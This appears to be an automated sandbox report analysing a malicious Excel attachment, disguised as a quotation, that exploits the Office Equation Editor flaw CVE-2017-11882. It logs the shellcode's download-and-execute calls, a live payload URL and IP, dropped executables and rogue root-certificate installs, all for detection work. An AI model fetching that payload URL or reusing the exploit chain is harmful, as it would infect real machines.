Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Quotation_398893.xlam.xlsx

Overview

General Information

Sample name:Quotation_398893.xlam.xlsx
Analysis ID:1530599
MD5:8ab8d813d3ca68c8effdb8abbf4a4f86
SHA1:f26fa096a70eec2a9900e363f63a1e6cafe5e8d4
SHA256:11a5d3add86410357163004a54f22335583b895a390e7eaf567e423ac7ccfeff
Tags:CVE-2017-11882xlamxlsxuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: File Dropped By EQNEDT32EXE
Document exploit detected (process start blacklist hit)
Installs new ROOT certificates
Office equation editor drops PE file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Shellcode detected
Sigma detected: Equation Editor Network Connection
Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
Sigma detected: Suspicious Microsoft Office Child Process
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Document misses a certain OLE stream usually present in this Microsoft Office document type
Drops PE files
Found inlined nop instructions (likely shell or obfuscated code)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 3352 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • EQNEDT32.EXE (PID: 3504 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • opponbvew.exe (PID: 3664 cmdline: C:\Users\user\AppData\Local\Temp\opponbvew.exe MD5: F5435E421FF6FCFC359478B4CF638358)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
sheet1.xmlINDICATOR_XML_LegacyDrawing_AutoLoad_Documentdetects AutoLoad documents using LegacyDrawingditekSHen
  • 0x1d1:$s1: <legacyDrawing r:id="
  • 0x1f9:$s2: <oleObject progId="
  • 0x22f:$s3: autoLoad="true"

Exploits

barindex
Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3504, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\vss[1].exe

System Summary

barindex
Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 154.38.177.76, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3504, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161
Source: Process startedAuthor: Jason Lynch: Data: Command: C:\Users\user\AppData\Local\Temp\opponbvew.exe, CommandLine: C:\Users\user\AppData\Local\Temp\opponbvew.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\opponbvew.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\opponbvew.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\opponbvew.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3504, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\opponbvew.exe, ProcessId: 3664, ProcessName: opponbvew.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Users\user\AppData\Local\Temp\opponbvew.exe, CommandLine: C:\Users\user\AppData\Local\Temp\opponbvew.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\opponbvew.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\opponbvew.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\opponbvew.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3504, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\opponbvew.exe, ProcessId: 3664, ProcessName: opponbvew.exe
Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3504, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-10-10T09:43:36.779057+020020197142Potentially Bad Traffic192.168.2.2249161154.38.177.76443TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: Quotation_398893.xlam.xlsxAvira: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\vss[1].exeVirustotal: Detection: 6%Perma Link
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exeVirustotal: Detection: 6%Perma Link
Source: Quotation_398893.xlam.xlsxReversingLabs: Detection: 71%
Source: Quotation_398893.xlam.xlsxVirustotal: Detection: 50%Perma Link

Exploits

barindex
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 154.38.177.76 Port: 443Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Local\Temp\opponbvew.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Local\Temp\opponbvew.exeJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: unknownHTTPS traffic detected: 154.38.177.76:443 -> 192.168.2.22:49161 version: TLS 1.2
Source: Binary string: F:\Pendriver\programas\crc vb.net\Teste Ok\Teste Ok\obj\Debug\TesteOk.pdb source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmp, opponbvew.exe, 00000004.00000000.467095355.0000000000CD6000.00000008.00000001.01000000.00000004.sdmp, vss[1].exe.1.dr, opponbvew.exe.1.dr

Software Vulnerabilities

barindex
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 1_2_03610775 WinExec,ExitProcess,1_2_03610775
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 1_2_036106C1 LoadLibraryW,URLDownloadToFileW,1_2_036106C1
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 1_2_0361072A URLDownloadToFileW,1_2_0361072A
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 1_2_03610649 URLDownloadToFileW,1_2_03610649
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 1_2_036106DB URLDownloadToFileW,1_2_036106DB
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 1_2_03610795 ExitProcess,1_2_03610795
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 1_2_03610614 ExitProcess,1_2_03610614
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exeCode function: 4x nop then dec eax4_2_000007FE8B6F4201
Source: global trafficDNS query: name: estqrow.com
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global trafficTCP traffic: 154.38.177.76:443 -> 192.168.2.22:49161
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global trafficTCP traffic: 154.38.177.76:443 -> 192.168.2.22:49161
Source: global trafficTCP traffic: 154.38.177.76:443 -> 192.168.2.22:49161
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global trafficTCP traffic: 154.38.177.76:443 -> 192.168.2.22:49161
Source: global trafficTCP traffic: 154.38.177.76:443 -> 192.168.2.22:49161
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global trafficTCP traffic: 154.38.177.76:443 -> 192.168.2.22:49161
Source: global trafficTCP traffic: 154.38.177.76:443 -> 192.168.2.22:49161
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global trafficTCP traffic: 154.38.177.76:443 -> 192.168.2.22:49161
Source: global trafficTCP traffic: 154.38.177.76:443 -> 192.168.2.22:49161
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global trafficTCP traffic: 154.38.177.76:443 -> 192.168.2.22:49161
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global trafficTCP traffic: 154.38.177.76:443 -> 192.168.2.22:49161
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global trafficTCP traffic: 154.38.177.76:443 -> 192.168.2.22:49161
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global trafficTCP traffic: 154.38.177.76:443 -> 192.168.2.22:49161
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global trafficTCP traffic: 154.38.177.76:443 -> 192.168.2.22:49161
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global trafficTCP traffic: 154.38.177.76:443 -> 192.168.2.22:49161
Source: Joe Sandbox ViewASN Name: COGENT-174US COGENT-174US
Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.22:49161 -> 154.38.177.76:443
Source: global trafficHTTP traffic detected: GET /rt/vss.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: estqrow.comConnection: Keep-Alive
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 1_2_036106C1 LoadLibraryW,URLDownloadToFileW,1_2_036106C1
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\vss[1].exeJump to behavior
Source: global trafficHTTP traffic detected: GET /rt/vss.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: estqrow.comConnection: Keep-Alive
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: global trafficDNS traffic detected: DNS query: estqrow.com
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: EQNEDT32.EXE, 00000001.00000002.468050895.0000000000314000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://estqrow.com/
Source: EQNEDT32.EXE, 00000001.00000002.468879887.0000000007210000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000001.00000002.468050895.00000000002C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://estqrow.com/rt/vss.exe
Source: EQNEDT32.EXE, 00000001.00000002.468879887.0000000007210000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://estqrow.com/rt/vss.exeC:
Source: EQNEDT32.EXE, 00000001.00000002.468050895.00000000002DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://estqrow.com/rt/vss.exehhC:
Source: EQNEDT32.EXE, 00000001.00000002.468180614.0000000003610000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://estqrow.com/rt/vss.exej
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
Source: unknownNetwork traffic detected: HTTP traffic on port 49161 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49161
Source: unknownHTTPS traffic detected: 154.38.177.76:443 -> 192.168.2.22:49161 version: TLS 1.2

System Summary

barindex
Source: sheet1.xml, type: SAMPLEMatched rule: detects AutoLoad documents using LegacyDrawing Author: ditekSHen
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Temp\opponbvew.exeJump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\vss[1].exeJump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
Source: Quotation_398893.xlam.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: sheet1.xml, type: SAMPLEMatched rule: INDICATOR_XML_LegacyDrawing_AutoLoad_Document author = ditekSHen, description = detects AutoLoad documents using LegacyDrawing
Source: classification engineClassification label: mal100.expl.winXLSX@4/4@1/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Quotation_398893.xlam.xlsxJump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exeMutant created: NULL
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR8A54.tmpJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: Quotation_398893.xlam.xlsxReversingLabs: Detection: 71%
Source: Quotation_398893.xlam.xlsxVirustotal: Detection: 50%
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Local\Temp\opponbvew.exe C:\Users\user\AppData\Local\Temp\opponbvew.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Local\Temp\opponbvew.exe C:\Users\user\AppData\Local\Temp\opponbvew.exeJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: credssp.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: ncrypt.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: bcrypt.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exeSection loaded: bcrypt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exeSection loaded: rpcrtremote.dllJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: Quotation_398893.xlam.xlsxInitial sample: OLE zip file path = xl/media/image1.png
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: Binary string: F:\Pendriver\programas\crc vb.net\Teste Ok\Teste Ok\obj\Debug\TesteOk.pdb source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmp, opponbvew.exe, 00000004.00000000.467095355.0000000000CD6000.00000008.00000001.01000000.00000004.sdmp, vss[1].exe.1.dr, opponbvew.exe.1.dr
Source: Quotation_398893.xlam.xlsxInitial sample: OLE indicators vbamacros = False
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 1_2_0361006C push eax; ret 1_2_0361006D
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 1_2_03610278 push edi; iretd 1_2_0361027C
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exeCode function: 4_2_000007FE8B6F00BD pushad ; iretd 4_2_000007FE8B6F00C1
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exeCode function: 4_2_000007FE8B6F00CD pushad ; iretd 4_2_000007FE8B6F00C1

Persistence and Installation Behavior

barindex
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Temp\opponbvew.exeJump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\vss[1].exeJump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
